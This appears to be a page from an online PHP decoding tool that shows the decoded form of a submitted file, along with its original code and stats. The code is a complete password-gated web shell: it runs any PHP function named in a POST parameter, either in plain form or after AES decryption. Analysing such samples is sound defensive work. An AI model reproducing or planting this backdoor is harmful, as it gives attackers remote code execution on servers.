Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

if(!isset($_POST["s64213"]) || hash("sha512", $_POST["s64213"]) != '40fc7487d1ada98a8510e1..

Decoded Output download

<?  if(!isset($_POST["s64213"]) || hash("sha512", $_POST["s64213"]) != '40fc7487d1ada98a8510e1f32ed28e996e5a2b00096eac5c10be2eec0926f0481e0c812410ab3da531fbf37bf4bbd70e3781b7f456555f4d630a2898f1137189'){ 
	exit(); 
} 
 
$md = $_POST["02b8186"]; 
if(isset($md)){ 
	$df = explode("#", $md); 
	echo $df[0]($df[1]); 
	echo true; 
} 
 
$mde = $_POST["02b8186ebc"]; 
$mdd = openssl_decrypt($mde,"AES-128-ECB",$_POST["k"]); 
if(isset($mdd)){ 
	$df = explode("#", $mdd); 
	echo $df[0]($df[1]); 
	echo true; 
} ?>

Did this file decode correctly?

Original Code

if(!isset($_POST["s64213"]) || hash("sha512", $_POST["s64213"]) != '40fc7487d1ada98a8510e1f32ed28e996e5a2b00096eac5c10be2eec0926f0481e0c812410ab3da531fbf37bf4bbd70e3781b7f456555f4d630a2898f1137189'){
	exit();
}

$md = $_POST["02b8186"];
if(isset($md)){
	$df = explode("#", $md);
	echo $df[0]($df[1]);
	echo true;
}

$mde = $_POST["02b8186ebc"];
$mdd = openssl_decrypt($mde,"AES-128-ECB",$_POST["k"]);
if(isset($mdd)){
	$df = explode("#", $mdd);
	echo $df[0]($df[1]);
	echo true;
}

Function Calls

hash 1

Variables

None

Stats

MD5 c12bfa4a3cee901240a64bd9be307085
Eval Count 0
Decode Time 36 ms